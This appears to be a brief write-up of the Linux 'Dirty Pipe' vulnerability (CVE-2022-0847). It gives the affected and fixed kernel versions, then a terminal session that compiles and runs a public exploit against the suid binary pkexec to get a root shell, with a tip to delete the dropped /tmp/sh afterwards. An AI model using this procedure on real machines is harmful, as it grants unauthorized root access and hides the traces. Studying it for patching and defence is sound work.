This is the story of CVE-2022-0847, a vulnerability in the Linux kernel since 5.8 which allows overwriting data in arbitrary read-only files. This leads to privilege escalation because unprivileged processes can inject code into root processes.
It is similar to CVE-2016-5195 “Dirty Cow” but is easier to exploit.
The vulnerability was fixed in Linux 5.16.11, 5.15.25 and 5.10.102.
$ gcc dirtypipez.c -o dirtypipez
$ file dirtypipez
dirtypipez: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=f7aee8d04713d6c27bc73e3f5fb59b1eee5feeaf, for GNU/Linux 3.2.0, not stripped
$ id
uid=1000(crypt0rr) gid=1000(crypt0rr) groups=1000(crypt0rr)
$ ./dirtypipez /usr/bin/pkexec
[+] hijacking suid binary..
[+] dropping suid shell..
[+] restoring suid binary..
[+] popping root shell.. (dont forget to clean up /tmp/sh ;))
# whoami
root
#
The vulnerable binary is run from /tmp/sh. Remember to remove it after using/re-using.
$ ls -l /tmp/sh
-rwsr-xr-x 1 root crypt0rr 186 Mar 8 10:19 /tmp/sh